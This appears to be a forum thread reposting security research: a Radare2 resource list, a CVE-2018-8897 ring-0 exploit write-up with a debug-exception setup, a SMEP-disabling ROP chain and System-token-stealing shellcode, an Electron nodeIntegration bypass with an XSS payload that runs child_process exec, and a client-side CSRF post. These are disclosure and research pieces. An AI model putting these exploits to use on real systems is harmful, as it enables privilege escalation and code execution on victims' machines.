mozilla::gfx::DrawTargetSkia::Stroke(mozilla::gfx::Path const*, mozilla::gfx::Pattern const&, mozilla::gfx::StrokeOptions const&, mozilla::gfx::DrawOptions const&) /builds/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:829:12 #12 0x7ff7bbd34dcc in mozilla::dom::CanvasRenderingContext2D::Stroke() /builds/worker/workspace/build/src/dom/canvas/CanvasRenderingContext2D.cpp:3562:11 #13 0x7ff7ba9b0701 in mozilla::dom::CanvasRenderingContext2DBinding::stroke(JSContext*, JS::Handle<JSObject*>, mozilla::dom::CanvasRenderingContext2D*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CanvasRenderingContext2DBinding.cpp:3138:13 #14 0x7ff7bbc3b4d1 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3031:13 #15 0x7ff7c26ae3b8 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/JSContext-inl.h:290:15 #16 0x7ff7c26ae3b8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:467 #17 0x7ff7c28ecd17 in js::jit::DoCallFallback(JSContext*, js::jit::BaselineFrame*, js::jit::ICCall_Fallback*, unsigned int, JS::Value*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jit/BaselineIC.cpp:2383:14 #18 0x1a432b56061a (<unknown module>) This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Sursa: https://bugs.chromium.org/p/project-zero/issues/detail?id=1541
-
Awesome Radare2 A curated list of awesome projects, articles and the other materials powered by Radare2. What is Radare2? Radare is a portable reversing framework that can... Disassemble (and assemble for) many different architectures Debug with local native and remote debuggers (gdb, rap, r2pipe, winedbg, windbg, ...) Run on Linux, *BSD, Windows, OSX, Android, iOS, Solaris and Haiku Perform forensics on filesystems and data carving Be scripted in Python, Javascript, Go and more Visualize data structures of several file types Patch programs to uncover new features or fix vulnerabilities Use powerful analysis capabilities to speed up reversing Aid in software exploitation More info here. Table of Contents Books Videos Recordings Asciinemas Conferences Slides Tutorials and Blogs Tools Scripts Contributing Awesome Radare2 Materials Books R2 "Book" Radare2 Explorations Radare2 wiki Videos Recordings Creating a keygen for FrogSek KGM#1 - by @binaryheadache Radare2 - An Introduction with a simple CrackMe - Part 1 - by @antojosep007 Introduction To Reverse Engineering With Radare2 Scripting radare2 with python for dynamic analysis - TUMCTF 2016 Zwiebel part 2 Asciinemas metasploit x86/shikata_ga_nai decoder using r2pipe and ESIL Filter for string's searching (urls, emails) Manual unpacking UPX on linux 64-bit Conferences r2con 2017 LinuxDays 2017 - Disassembling with radare2 SUE 2017 - Reverse Engineering Embedded ARM Devices radare demystified (33c3) r2con 2016 Reversing with Radare2 - OverDrive Conference Radare2 & frida hack-a-ton 2015 Radare from A to Z 2015 Reverse engineering embedded software using Radare2 - Linux.conf.au 2015 OggCamp - Shellcode - vext01 Slides and Workshops Radare2 cheat-sheet r2m2 - radare2 + miasm2 = ♥ Radare2 Workshop 2015 (Defcon) Emulating Code In Radare2 Radare from A to Z 2015 Radare2 Workshop 2015 (Hack.lu) Radare2 & frida hack-a-ton 2015 radare2: evolution radare2: from forensics to bindiffing Tutorials and Blogs Linux Malware by @MalwareMustDie Radare2 - Using Emulation To Unpack Metasploit Encoders - by @xpn Reverse engineering a Gameboy ROM with radare2 - by @megabeets_ radare2 as an alternative to gdb-peda How to find offsets for v0rtex (by Siguza) Debugging a Forking Server with r2 Defeating IOLI with radare2 in 2017 Using r2 to analyse Minidumps Android malware analysis with Radare: Dissecting the Triada Trojan Solving game2 from the badge of Black Alps 2017 with radare2 ROPEmporium: Pivot 64-bit CTF Walkthrough With Radare2 ROPEmporium: Pivot 32-bit CTF Walkthrough With Radare2 Reversing EVM bytecode with radare2 Radare2’s Visual Mode Crackme0x03 Dissected with Radare2 Crackme0x02 Dissected with Radare2 Crackme0x01 Dissected with Radare2 Debugging Using Radare2… and Windows! - by @jacob16682 Decrypting APT33’s Dropshot Malware with Radare2 and Cutter – Part 1 - by @megabeets_ A journey into Radare 2 – Part 2: Exploitation - by @megabeets_ A journey into Radare 2 – Part 1: Simple crackme - by @megabeets_ Reverse Engineering With Radare2 - by @insinuator Write-ups from RHME3 pre-qualifications at RADARE2 conference Hackover CTF 2016 - tiny_backdoor writeup radare2 redux: Single-Step Debug a 64-bit Executable and Shared Object Reversing and Exploiting Embedded Devices: The Software Stack (Part 1) Binary Bomb with Radare2 - by @binaryheadache crackserial_linux with radare2 - by @binaryheadache Examining malware with r2 - by @binaryheadache Breaking Cerber strings obfuscation with Python and radare2 - by @aaSSfxxx Radare2 of the Lost Magic Gadget - by @0xabe_io Radare 2 in 0x1E minutes - by @superkojiman Exploiting ezhp (pwn200) from PlaidCTF 2014 with radare2 Baleful was a challenge relased in picoctf At Gunpoint Hacklu 2014 With Radare2 - by @crowell Pwning With Radare2 - by @crowell Solving ‘heap’ from defcon 2014 qualifier with r2 - by @alvaro_fe How to radare2 a fake openssh exploit - by jvoisin Disassembling 6502 code with Radare – Part I - by @ricardoquesada Disassembling 6502 code with Radare – Part II - by @ricardoquesada Unpacking shikata-ga-nai by scripting radare2 This repository contains a collection of documents, scripts and utilities that will allow you to use IDA and R2 Raspberry PI hang instruction - by @pancake Solving avatao's "R3v3rs3 4" - by @sghctoma Reverse Engineering With Radare2, Part 1 - by @sam_symons Simple crackme with Radare2 - by @futex90 Pwning With Radare2 - by @crowell Reversing the FBI malware's payload (shellcode) with radare2 - by @MalwareMustDie ROPping to Victory ROPping to Victory - Part 2, split Tools Docker image encapsulates the reverse-engineering framework Malfunction - Malware Analysis Tool using Function Level Fuzzy Hashing rarop - graphical ROP chain builder using radare2 and r2pipe Radare2 and Frida better together Android APK analyzer based on radare2 Scripts helper radare2 script to analyze UEFI firmware modules ThinkPwn Scanner - by @d_olex and @trufae radare2-lldb integration create a YARA signature for the bytes of the current function A radare2 Plugin to perform symbolic execution with a simple macro call (r2 + angr) Just a simple radare2 Jupyter kernel r2scapy - a radare2 plugin that decodes packets with Scapy A plugin for Hex-Ray's IDA Pro and radare2 to export the symbols recognized to the ELF symbol table radare2 plugin - converts asm to pseudo-C code (experimental) A python script using radare2 for decrypt and patch the strings of GootKit malware Collection of scripts for radare2 for MIPS arch Extract functions and opcodes with radare2 - by @andrewaeva r2-ropstats - a set of tools based on radare2 for analysis of ROP gadgets and payloads Patch kextd using radare2 Python-r2pipe script that draws ascii and graphviz graphs of library dependencies Simple XOR DDOS strings deobfuscator - by @NighterMan Decode multiple shellcodes encoded with msfencode - by @NighterMan Baleful CTF task plugins Contributing Please refer the guidelines at contributing.md for details. Sursa: https://github.com/dukebarman/awesome-radare2
-
- 1
-
-
Nu stiu cum e pe telefon, dar la Activity iti poti seta cum sa arate feed-ul personalizat.
-
Si eu postez la fel uneori. Ideea e ca acele posturi sunt utile. Printre posturile lui @OKQL am gasit lucruri despre care nu stiam, si in general sunt la curent cum cam tot ce apare.
-
1. http://jsbeautifier.org/ 2. Inlocuiesti eval cu alert (de exemplu) 3. http://jsbeautifier.org/ 4. Ai din nou eval Nu am timp de mai mult momentan.
-
Arbitrary Code Execution at Ring 0 using CVE-2018-8897 Can BölükMay 11, 201801017.9k Just a few days ago, a new vulnerability allowing an unprivileged user to run #DB handler with user-mode GSBASE was found by Nick Peterson (@nickeverdox) and Nemanja Mulasmajic (@0xNemi). At the end of the whitepaper they published on triplefault.io, they mentioned that they were able to load and execute unsigned kernel code, which got me interested in the challenge; and that’s exactly what I’m going to attempt doing in this post. Before starting, I would like to note that this exploit may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. I debugged it by “simulating” this situation. Final source code can be found at the bottom. 0x0: Setting Up the Basics The fundamentals of this exploit is really simple unlike the exploitation of it. When stack segment is changed –whether via MOV or POP– until the next instruction completes interrupts are deferred. This is not a microcode bug but rather a feature added by Intel so that stack segment and stack pointer can get set at the same time. However, many OS vendors missed this detail, which lets us raise a #DB exception as if it comes from CPL0 from user-mode. We can create a deferred-to-CPL0 exception by setting debug registers in such a way that during the execution of stack-segment changing instruction a #DB will raise and calling int 3 right after. int 3 will jump to KiBreakpointTrap, and before the first instruction of KiBreakpointTrap executes, our #DB will be raised. As it is mentioned by the everdox and 0xNemi in the original whitepaper, this lets us run a kernel-mode exception handler with our user-mode GSBASE. Debug registers and XMM registers will also be persisted. All of this can be done in a few lines like shown below: #include <Windows.h> #include <iostream> void main() { static DWORD g_SavedSS = 0; _asm { mov ax, ss mov word ptr [ g_SavedSS ], ax } CONTEXT Ctx = { 0 }; Ctx.Dr0 = ( DWORD ) &g_SavedSS; Ctx.Dr7 = ( 0b1 << 0 ) | ( 0b11 << 16 ) | ( 0b11 << 18 ); Ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS; SetThreadContext( HANDLE( -2 ), &Ctx ); PVOID FakeGsBase = ...; _asm { mov eax, FakeGsBase ; Set eax to fake gs base push 0x23 push X64_End push 0x33 push X64_Start retf X64_Start: __emit 0xf3 ; wrgsbase eax __emit 0x0f __emit 0xae __emit 0xd8 retf X64_End: ; Vulnerability mov ss, word ptr [ g_SavedSS ] ; Defer debug exception int 3 ; Execute with interrupts disabled nop } } This example is 32-bit for the sake of showing ASM and C together, the final working code will be 64-bit. Now let’s start debugging, we are in KiDebugTrapOrFault with our custom GSBASE! However, this is nothing but catastrophic, almost no function works and we will end up in a KiDebugTrapOrFault->KiGeneralProtectionFault->KiPageFault->KiPageFault->… infinite loop. If we had a perfectly valid GSBASE, the outcome of what we achieved so far would be a KMODE_EXCEPTION_NOT_HANDLED BSOD, so let’s focus on making GSBASE function like the real one and try to get to KeBugCheckEx. We can utilize a small IDA script to step to relevant parts faster: #include <idc.idc> static main() { Message( "--- Step Till Next GS ---\n" ); while( 1 ) { auto Disasm = GetDisasmEx( GetEventEa(), 1 ); if ( strstr( Disasm, "gs:" ) >= Disasm ) break; StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); } } 0x1: Fixing the KPCR Data Here are the few cases we have to modify GSBASE contents to pass through successfully: – KiDebugTrapOrFault KiDebugTrapOrFault: ... MEMORY:FFFFF8018C20701E ldmxcsr dword ptr gs:180h Pcr.Prcb.MxCsr needs to have a valid combination of flags to pass this instruction or else it will raise a #GP. So let’s set it to its initial value, 0x1F80. – KiExceptionDispatch KiExceptionDispatch: ... MEMORY:FFFFF8018C20DB5F mov rax, gs:188h MEMORY:FFFFF8018C20DB68 bt dword ptr [rax+74h], 8 Pcr.Prcb.CurrentThread is what resides in gs:188h. We are going to allocate a block of memory and reference it in gs:188h. – KiDispatchException KiDispatchException: ... MEMORY:FFFFF8018C12A4D8 mov rax, gs:qword_188 MEMORY:FFFFF8018C12A4E1 mov rax, [rax+0B8h] This is Pcr.Prcb.CurrentThread.ApcStateFill.Process and again we are going to allocate a block of memory and simply make this pointer point to it. KeCopyLastBranchInformation: ... MEMORY:FFFFF8018C12A0AC mov rax, gs:qword_20 MEMORY:FFFFF8018C12A0B5 mov ecx, [rax+148h] 0x20 from GSBASE is Pcr.CurrentPrcb, which is simply Pcr + 0x180. Let’s set Pcr.CurrentPrcb to Pcr + 0x180 and also set Pcr.Self to &Pcr while on it. – RtlDispatchException This one is going to be a little bit more detailed. RtlDispatchException calls RtlpGetStackLimits, which calls KeQueryCurrentStackInformation and __fastfails if it fails. The problem here is that KeQueryCurrentStackInformation checks the current value of RSP against Pcr.Prcb.RspBase, Pcr.Prcb.CurrentThread->InitialStack, Pcr.Prcb.IsrStack and if it doesn’t find a match it reports failure. We obviously cannot know the value of kernel stack from user-mode, so what to do? There’s a weird check in the middle of the function: char __fastcall KeQueryCurrentStackInformation(_DWORD *a1, unsigned __int64 *a2, unsigned __int64 *a3) { ... if ( *(_QWORD *)(*MK_FP(__GS__, 392i64) + 40i64) == *MK_FP(__GS__, 424i64) ) { ... } else { *v5 = 5; result = 1; *v3 = 0xFFFFFFFFFFFFFFFFi64; *v4 = 0xFFFF800000000000i64; } return result; } Thanks to this check, as long as we make sure KThread.InitialStack (KThread + 0x28) is not equal to Pcr.Prcb.RspBase (gs:1A8h) KeQueryCurrentStackInformation will return success with 0xFFFF800000000000-0xFFFFFFFFFFFFFFFF as the reported stack range. Let’s go ahead and set Pcr.Prcb.RspBase to 1 and Pcr.Prcb.CurrentThread->InitialStack to 0. Problem solved. RtlDispatchException after these changes will fail without bugchecking and return to KiDispatchException. – KeBugCheckEx We are finally here. Here’s the last thing we need to fix: MEMORY:FFFFF8018C1FB94A mov rcx, gs:qword_20 MEMORY:FFFFF8018C1FB953 mov rcx, [rcx+62C0h] MEMORY:FFFFF8018C1FB95A call RtlCaptureContext Pcr.CurrentPrcb->Context is where KeBugCheck saves the context of the caller and for some weird reason, it is a PCONTEXT instead of a CONTEXT. We don’t really care about any other fields of Pcr so let’s just set it to Pcr+ 0x3000 just for the sake of having a valid pointer for now. 0x2: and Write|What|Where And there we go, sweet sweet blue screen of victory! Now that everything works, how can we exploit it? The code after KeBugCheckEx is too complex to step in one by one and it is most likely not-so-fun to revert from so let’s try NOT to bugcheck this time. I wrote another IDA script to log the points of interest (such as gs: accesses and jumps and calls to registers and [registers+x]) and made it step until KeBugCheckEx is hit: #include <idc.idc> static main() { Message( "--- Logging Points of Interest ---\n" ); while( 1 ) { auto IP = GetEventEa(); auto Disasm = GetDisasmEx( IP, 1 ); if ( ( strstr( Disasm, "gs:" ) >= Disasm ) || ( strstr( Disasm, "jmp r" ) >= Disasm ) || ( strstr( Disasm, "call r" ) >= Disasm ) || ( strstr( Disasm, "jmp" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) || ( strstr( Disasm, "call" ) >= Disasm && strstr( Disasm, "[r" ) >= Disasm ) ) { Message( "-- %s (+%x): %s\n", GetFunctionName( IP ), IP - GetFunctionAttr( IP, FUNCATTR_START ), Disasm ); } StepInto(); GetDebuggerEvent( WFNE_SUSP, -1 ); if( IP == ... ) break; } } To my disappointment, there is no convenient jumps or calls. The whole output is: - KiDebugTrapOrFault (+3d): test word ptr gs:278h, 40h - sub_FFFFF8018C207019 (+5): ldmxcsr dword ptr gs:180h -- KiExceptionDispatch (+5f): mov rax, gs:188h --- KiDispatchException (+48): mov rax, gs:188h --- KiDispatchException (+5c): inc gs:5D30h ---- KeCopyLastBranchInformation (+38): mov rax, gs:20hh ---- KeQueryCurrentStackInformation (+3b): mov rax, gs:188h ---- KeQueryCurrentStackInformation (+44): mov rcx, gs:1A8h --- KeBugCheckEx (+1a): mov rcx, gs:20h This means that we have to find a way to write to kernel-mode memory and abuse that instead. RtlCaptureContext will be a tremendous help here. As I mentioned before, it is taking the context pointer from Pcr.CurrentPrcb->Context, which is weirdly a PCONTEXT Context and not a CONTEXT Context, meaning we can supply it any kernel address and make it write the context over it. I was originally going to make it write over g_CiOptions and continuously NtLoadDriver in another thread, but this idea did not work as well as I thought (That being said, appearently this is the way @0xNemi and @nickeverdox got it working. I guess we will see what dark magic they used at BlackHat 2018.) simply because the current thread is stuck in an infinite loop and the other thread trying to NtLoadDriver will not succeed because of the IPI it uses: NtLoadDriver->…->MiSetProtectionOnSection->KeFlushMultipleRangeTb->IPI->Deadlock After playing around with g_CiOptions for 1-2 days, I thought of a much better idea: overwriting the return address of RtlCaptureContext. How are we going to overwrite the return address without having access to RSP? If we use a little bit of creativity, we actually can have access to RSP. We can get the current RSP by making Prcb.Context point to a user-mode memory and polling Context.RSP value from a secondary thread. Sadly, this is not useful by itself as we already passed RtlCaptureContext (our write what where exploit). However, if we could return back to KiDebugTrapOrFault after RtlCaptureContext finishes its work and somehow predict the next value of RSP, this would be extremely abusable; which is exactly what we are going to do. To return back to KiDebugTrapOrFault, we will again use our lovely debug registers. Right after RtlCaptureContext returns, a call to KiSaveProcessorControlState is made. .text:000000014017595F mov rcx, gs:20h .text:0000000140175968 add rcx, 100h .text:000000014017596F call KiSaveProcessorControlState .text:0000000140175C80 KiSaveProcessorControlState proc near ; CODE XREF: KeBugCheckEx+3Fp .text:0000000140175C80 ; KeSaveStateForHibernate+ECp ... .text:0000000140175C80 mov rax, cr0 .text:0000000140175C83 mov [rcx], rax .text:0000000140175C86 mov rax, cr2 .text:0000000140175C89 mov [rcx+8], rax .text:0000000140175C8D mov rax, cr3 .text:0000000140175C90 mov [rcx+10h], rax .text:0000000140175C94 mov rax, cr4 .text:0000000140175C97 mov [rcx+18h], rax .text:0000000140175C9B mov rax, cr8 .text:0000000140175C9F mov [rcx+0A0h], rax We will set DR1 on gs:20h + 0x100 + 0xA0, and make KeBugCheckEx return back to KiDebugTrapOrFault just after it saves the value of CR4. To overwrite the return pointer, we will first let KiDebugTrapOrFault->…->RtlCaptureContext execute once giving our user-mode thread an initial RSP value, then we will let it execute another time to get the new RSP, which will let us calculate per-execution RSP difference. This RSP delta will be constant because the control flow is also constant. Now that we have our RSP delta, we will predict the next value of RSP, subtract 8 from that to calculate the return pointer of RtlCaptureContext and make Prcb.Context->Xmm13 – Prcb.Context->Xmm15 written over it. Thread logic will be like the following: volatile PCONTEXT Ctx = *( volatile PCONTEXT* ) ( Prcb + Offset_Prcb__Context ); while ( !Ctx->Rsp ); // Wait for RtlCaptureContext to be called once so we get leaked RSP uint64_t StackInitial = Ctx->Rsp; while ( Ctx->Rsp == StackInitial ); // Wait for it to be called another time so we get the stack pointer difference // between sequential KiDebugTrapOrFault StackDelta = Ctx->Rsp - StackInitial; PredictedNextRsp = Ctx->Rsp + StackDelta; // Predict next RSP value when RtlCaptureContext is called uint64_t NextRetPtrStorage = PredictedNextRsp - 0x8; // Predict where the return pointer will be located at NextRetPtrStorage &= ~0xF; *( uint64_t* ) ( Prcb + Offset_Prcb__Context ) = NextRetPtrStorage - Offset_Context__XMM13; // Make RtlCaptureContext write XMM13-XMM15 over it Now we simply need to set-up a ROP chain and write it to XMM13-XMM15. We cannot predict which half of XMM15 will get hit due to the mask we apply to comply with the movaps alignment requirement, so first two pointers should simply point at a [RETN] instruction. We need to load a register with a value we choose to set CR4 so XMM14 will point at a [POP RCX; RETN] gadget, followed by a valid CR4 value with SMEP disabled. As for XMM13, we are simply going to use a [MOV CR4, RCX; RETN;] gadget followed by a pointer to our shellcode. The final chain will look something like: -- &retn; (fffff80372e9502d) -- &retn; (fffff80372e9502d) -- &pop rcx; retn; (fffff80372ed9122) -- cr4_nosmep (00000000000506f8) -- &mov cr4, rcx; retn; (fffff803730045c7) -- &KernelShellcode (00007ff613fb1010) In our shellcode, we will need to restore the CR4 value, swapgs, rollback ISR stack, execute the code we want and IRETQ back to user-mode which can be done like below: NON_PAGED_DATA fnFreeCall k_ExAllocatePool = 0; using fnIRetToVulnStub = void( * ) ( uint64_t Cr4, uint64_t IsrStack, PVOID ContextBackup ); NON_PAGED_DATA BYTE IRetToVulnStub[] = { 0x0F, 0x22, 0xE1, // mov cr4, rcx ; cr4 = original cr4 0x48, 0x89, 0xD4, // mov rsp, rdx ; stack = isr stack 0x4C, 0x89, 0xC1, // mov rcx, r8 ; rcx = ContextBackup 0xFB, // sti ; enable interrupts 0x48, 0xCF // iretq ; interrupt return }; NON_PAGED_CODE void KernelShellcode() { __writedr( 7, 0 ); uint64_t Cr4Old = __readgsqword( Offset_Pcr__Prcb + Offset_Prcb__Cr4 ); __writecr4( Cr4Old & ~( 1 << 20 ) ); __swapgs(); uint64_t IsrStackIterator = PredictedNextRsp - StackDelta - 0x38; // Unroll nested KiBreakpointTrap -> KiDebugTrapOrFault -> KiTrapDebugOrFault while ( ( ( ISR_STACK* ) IsrStackIterator )->CS == 0x10 && ( ( ISR_STACK* ) IsrStackIterator )->RIP > 0x7FFFFFFEFFFF ) { __rollback_isr( IsrStackIterator ); // We are @ KiBreakpointTrap -> KiDebugTrapOrFault, which won't follow the RSP Delta if ( ( ( ISR_STACK* ) ( IsrStackIterator + 0x30 ) )->CS == 0x33 ) { /* fffff00e`d7a1bc38 fffff8007e4175c0 nt!KiBreakpointTrap fffff00e`d7a1bc40 0000000000000010 fffff00e`d7a1bc48 0000000000000002 fffff00e`d7a1bc50 fffff00ed7a1bc68 fffff00e`d7a1bc58 0000000000000000 fffff00e`d7a1bc60 0000000000000014 fffff00e`d7a1bc68 00007ff7e2261e95 -- fffff00e`d7a1bc70 0000000000000033 fffff00e`d7a1bc78 0000000000000202 fffff00e`d7a1bc80 000000ad39b6f938 */ IsrStackIterator = IsrStackIterator + 0x30; break; } IsrStackIterator -= StackDelta; } PVOID KStub = ( PVOID ) k_ExAllocatePool( 0ull, ( uint64_t )sizeof( IRetToVulnStub ) ); Np_memcpy( KStub, IRetToVulnStub, sizeof( IRetToVulnStub ) ); // ------ KERNEL CODE ------ .... // ------ KERNEL CODE ------ __swapgs(); ( ( ISR_STACK* ) IsrStackIterator )->RIP += 1; ( fnIRetToVulnStub( KStub ) )( Cr4Old, IsrStackIterator, ContextBackup ); } We can’t restore any registers so we will make the thread responsible for the execution of vulnerability store the context in a global container and restore from it instead. Now that we executed our code and returned to user-mode, our exploit is complete! Let’s make a simple demo stealing the System token: uint64_t SystemProcess = *k_PsInitialSystemProcess; uint64_t CurrentProcess = k_PsGetCurrentProcess(); uint64_t CurrentToken = k_PsReferencePrimaryToken( CurrentProcess ); uint64_t SystemToken = k_PsReferencePrimaryToken( SystemProcess ); for ( int i = 0; i < 0x500; i += 0x8 ) { uint64_t Member = *( uint64_t * ) ( CurrentProcess + i ); if ( ( Member & ~0xF ) == CurrentToken ) { *( uint64_t * ) ( CurrentProcess + i ) = SystemToken; break; } } k_PsDereferencePrimaryToken( CurrentToken ); k_PsDereferencePrimaryToken( SystemToken ); Complete implementation of the concept can be found at: https://github.com/can1357/CVE-2018-8897 Credits: @0xNemi and @nickeverdox for finding the vulnerability P.S.: If you want to try this exploit out, you can uninstall the relevant update and give it a try! P.P.S.: Before you ask why I don’t use intrinsics to read/write GSBASE, it is because MSVC generates invalid code: Sursa: https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/
-
CVE-2018-1000136 - Electron nodeIntegration Bypass May 10, 2018 Posted By Brendan Scarvell Comments (2) A few weeks ago, I came across a vulnerability that affected all current versions of Electron at the time (< 1.7.13, < 1.8.4, and < 2.0.0-beta.3). The vulnerability allowed nodeIntegration to be re-enabled, leading to the potential for remote code execution. If you're unfamiliar with Electron, it is a popular framework that allows you to create cross-platform desktop applications using HTML, CSS, and JavaScript. Some popular applications such as Slack, Discord, Signal, Atom, Visual Studio Code, and Github Desktop are all built using the Electron framework. You can find a list of applications built with Electron here. Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js' built in modules. This makes XSS particularly dangerous, as an attacker's payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side. Atom had an XSS vulnerability not too long ago which did exactly that. You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences. There's also a WebView tag feature which allows you to embed content, such as web pages, into your Electron application and run it as a separate process. When using a WebView tag you are also able to pass in a number of attributes, including nodeIntegration. WebView containers do not have nodeIntegration enabled by default. The documentation states that if the webviewTag option is not explicitly declared in your webPreferences, it will inherit the same permissions of whatever the value of nodeIntegration is set to. By default, Electron also uses its own custom window.open() function which creates a new instance of a BrowserWindow. The child window will inherit all of the parent window's options (which includes its webPreferences) by default. The custom window.open() function does allow you to override some of the inherited options by passing in a featuresargument: if (!usesNativeWindowOpen) { // Make the browser window or guest view emit "new-window" event. window.open = function (url, frameName, features) { if (url != null && url !== '') { url = resolveURL(url) } const guestId = ipcRenderer.sendSync('ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPEN', url, toString(frameName), toString(features)) if (guestId != null) { return getOrCreateProxy(ipcRenderer, guestId) } else { return null } } if (openerId != null) { window.opener = getOrCreateProxy(ipcRenderer, openerId) } } When Electron's custom window.open function is called, it emits an ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPENevent. The ELECTRON_GUEST_WINDOW_MANAGER_WINDOW_OPENevent handler then parses the features provided, adding them as options to the newly created window and then emits an ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPENevent. To prevent child windows from being able to do nasty things like re-enabling nodeIntegration when the parent window has it explicitly disabled, guest-window-manager.js contains a hardcoded list of webPreferences options and their restrictive values: // Security options that child windows will always inherit from parent windows const inheritedWebPreferences = new Map([ ['contextIsolation', true], ['javascript', false], ['nativeWindowOpen', true], ['nodeIntegration', false], ['sandbox', true], ['webviewTag', false] ]); The ELECTRON_GUEST_WINDOW_MANAGER_INTERNAL_WINDOW_OPEN event handler then calls the mergeBrowserWindowOptionsfunction which ensures that the restricted attributes of the parent window's webPreferences are applied to the child window: const mergeBrowserWindowOptions = function (embedder, options) { [...] // Inherit certain option values from parent window for (const [name, value] of inheritedWebPreferences) { if (embedder.getWebPreferences()[name] === value) { options.webPreferences[name] = value } } // Sets correct openerId here to give correct options to 'new-window' event handler options.webPreferences.openerId = embedder.id return options } And here is where the vulnerability lays. The mergeBrowserWindowOptions function didn't take into account what the default values of these restricted attributes should be if they were undefined. In other words, if webviewTag: falsewasn't explicitly declared in your application's webPreferences (and was therefore being inferred by explicitly setting nodeIntegration: false), when mergeBrowserWindowOptions went to check the webviewTag, it would then come back undefined thus making the above if statement return false and not apply the parent's webviewTag preference. This allowed window.open to pass the webviewTag option as an additional feature, re-enabling nodeIntegration and allowing the potential for remote code execution. The following proof-of-concept shows how an XSS payload can re-enable nodeIntegration during run time and allow execution of system commands: <script> var x = window.open('data://yoloswag','','webviewTag=yes,show=no'); x.eval( "var webview = new WebView;"+ "webview.setAttribute('webpreferences', 'webSecurity=no, nodeIntegration=yes');"+ "webview.src = `data:text/html;base64,PHNjcmlwdD5yZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnbHMgLWxhJywgZnVuY3Rpb24gKGUscikgeyBhbGVydChyKTt9KTs8L3NjcmlwdD4=`;"+ "document.body.appendChild(webview)" ); </script> If you find an Electron application with the nodeIntegration option disabled and it contains either an XSS vulnerability through poor sanitization of user input or a vulnerability in another dependency of the application, the above proof-of-concept can allow for remote code execution provided that the application is using a vulnerable version of Electron (version < 1.7.13, < 1.8.4, or < 2.0.0-beta.3) , and hasn't manually opted into one of the following: Declared webviewTag: false in its webPreferences. Enabled the nativeWindowOption option in its webPreferences. Intercepting new-window events and overriding event.newGuest without using the supplied options tag. We'd also like to thank the Electron team for being extremely responsive and for quickly providing a patch to the public. This vulnerability was assigned the CVE identifier CVE-2018-1000136. Sursa: https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2018-1000136---Electron-nodeIntegration-Bypass/
-
“Client-Side” CSRF Facebook Bug Bounty·Friday, May 11, 2018 At Facebook, the Whitehat program receives hundreds of submissions a month, covering a wide range of vulnerability types. One of the interesting classes of issue which we've seen recently is what we've termed “Client-Side” Cross-Site Request Forgery (CSRF), which we've awarded on average $7.5k. What is CSRF? Before we jump into technical details, let's recap on what CSRF is. This is a class of issue in which an attacker can perform a state changing action, such as posting a status, on behalf of another user. This is made possible due to the fact that browsers (currently, until Same-Site Cookies are supported in all major browsers) send the user's cookies with a request, regardless of the request origin. At Facebook, like other large sites, we have protections in place to mitigate this kind of attack. The most common type of protection is by adding a random token to each state-changing request, and verifying this server-side. An attacker has no way of knowing this value in advance, which means we can ensure any request has explicitly been made by the user. If you're participating in our Whitehat program, then you might see this token being sent - we name it “fb_dtsg”. “Client-Side” CSRF Whilst most researchers think of CSRF as a server-side problem, “Client-Side” CSRF exists in the user's browser or mobile device - a malicious user could perform arbitrary requests to a CSRF-protected end-point, by modifying the end-point to which the client-side code makes an HTTP request to with a valid CSRF token. This could be a form submission, or an XHR call. For example, a product might want to log some analytic data after the page is loaded, which could look the following code: let analytic_uri = window.location.hash.substr(1); (new AsyncRequest(“/ajax” + analytic_uri)) .method(POST) .setBody({csrf_token: csrf_token}) .send() The user would browse to /profile.php#/profile/log. On page load, the JS would make a POST request to “/ajax/profile/log”, and the data saved. However, if an attacker modifies the fragment to “#/updatestatus?status=Hello”, then the JS is instead making a request to update the user's status, with a valid CSRF token. One good trick for hunting for these kind of issues is looking for HTTP requests which are made after the page is rendered - if the end-point being requested is contained in the page's query string or fragment, then it's worth investigating! If you can only control part of the end-point, then it could still be vulnerable, by using tricks like path traversal. Making arbitrary GraphQL requests We had a great submission from one of our top researchers, Philippe Harewood, which used this style of issue to make arbitrary GraphQL on behalf of another user, for which we rewarded him $7,500. On https://business.instagram.com, we had a page which took a business ID from the request, and made a Graph API request to that particular business: POST /[business_id]?fields=... access_token=... Facebook's Graph API is protected against CSRF by requiring a valid access token from the user. Without this token, the request is un-authenticated. Philippe found that since the business ID wasn't validated to be an integer, he could change this to point to our GraphQL end-point (graphql), and make authenticated requests for the user (such as posting a new status), since the JS was making the request with the access token: POST /graphql?q=Mutation...&fields=... access_token=... This is a great example of influencing authenticated requests to point somewhere completely unintended. Conclusion These issues are an interesting and novel take on an older class of bugs, which has prompted us to take a look at ways of detecting and mitigating bugs in JS. If you too enjoy investigating and solving novel bugs, then come join the ProdSec team! Sursa: https://www.facebook.com/notes/facebook-bug-bounty/client-side-csrf/2056804174333798/
-
